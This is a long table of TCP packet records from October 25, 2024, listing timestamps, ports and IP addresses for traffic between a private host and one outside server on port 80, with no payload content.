Oct 25, 2024 05:21:07.417682886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417696953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417709112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417710066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417712927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417728901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417730093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417743921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417749882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417761087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417776108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417776108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417776108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417792082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417805910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417820930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417824030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417824984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417824984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417836905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417853117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417856932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417857885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417869091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417879105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417886019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417901993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417911053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417917013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417932987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417933941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417949915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417963028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.417965889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417982101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.417994976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.418000937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.418016911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.418018103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.418035984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.418036938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.418051004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.418066025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.418068886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.418082952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.418092966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.418111086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.418225050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485688925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485721111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485753059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485769987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485799074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485812902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485831022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485846996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485862017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485876083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485891104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485893011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485893011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485893011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485893011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485893011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485893011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485893011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485929966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485937119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485937119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485946894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485960007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485970974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485970974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.485975027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.485985041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.486001968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.486012936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.486016989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.486030102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.486040115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.486051083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.486058950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.486084938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.486110926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.486119032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.486124039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.486152887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.486165047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.486190081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.486201048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.486232042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527460098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527493954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527503014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527518034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527551889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527573109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527580976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527586937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527614117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527631044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527646065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527658939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527658939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527677059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527682066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527693033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527709007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527724028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527731895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527738094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527760983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527760983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527767897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527785063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527786970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527812958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527817011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527832031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527832985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527848959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527877092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527883053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527883053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527904034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527930975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.527944088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.527977943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528042078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528074026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528105974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528166056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528168917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528170109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528170109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528170109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528170109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528202057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528235912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528254986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528254986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528283119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528357029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528419971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528481960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528515100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528557062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528557062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528558016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528594017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528630018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528678894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528678894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528678894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528692007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528745890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528760910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528810978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528825045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528858900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528888941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528891087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528912067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.528985977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.528987885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529038906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529047966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529102087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529119968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529149055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529170036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529181957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529196024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529239893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529248953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529304981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529314041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529367924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529377937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529428959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529441118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529479980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529490948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529514074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529531002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529550076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529566050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529603958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529613972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529649019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529665947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529701948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529716015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529763937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529778004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529833078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529843092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529905081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529906988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529937983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529952049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.529973030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.529989958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530019045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530035973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530086040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530098915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530150890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530159950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530193090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530213118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530225992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530235052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530261040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530276060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530293941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530312061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530328989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530334949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530359030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530380964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530394077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530411005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530427933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530441999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530462980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530476093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530517101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530525923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530566931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530579090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530612946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530637980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530646086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530657053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530680895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530699015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530714989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530736923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530749083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530761957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530782938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530800104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530817032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530843019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530860901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530879021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530930042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530930996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530960083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.530978918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.530992031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531019926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531028032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531040907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531074047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531094074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531107903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531125069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531143904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531148911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531177998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531194925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531212091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531225920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531249046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531260967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531294107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531302929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531344891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531380892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531438112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531445026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531500101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531508923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531564951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531572104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531605959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531625032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531640053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531655073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531668901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531698942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531719923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531733990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531791925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531796932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531832933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531866074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531866074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531888962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531910896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.531941891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.531999111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532023907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532078028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532085896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532140017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532150030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532202959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532212019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532248020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532265902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532283068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532295942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532320976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532339096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532355070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532368898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532391071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532412052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532423973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532435894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532459021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532474995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532494068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532505989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532529116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532550097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532562971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532587051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532598972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532608032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532633066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532648087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532669067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532687902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532702923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532727957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532738924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532769918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:07.532773972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:07.532789946 CEST	49730	80	192.168.2.4	185.215.113.37
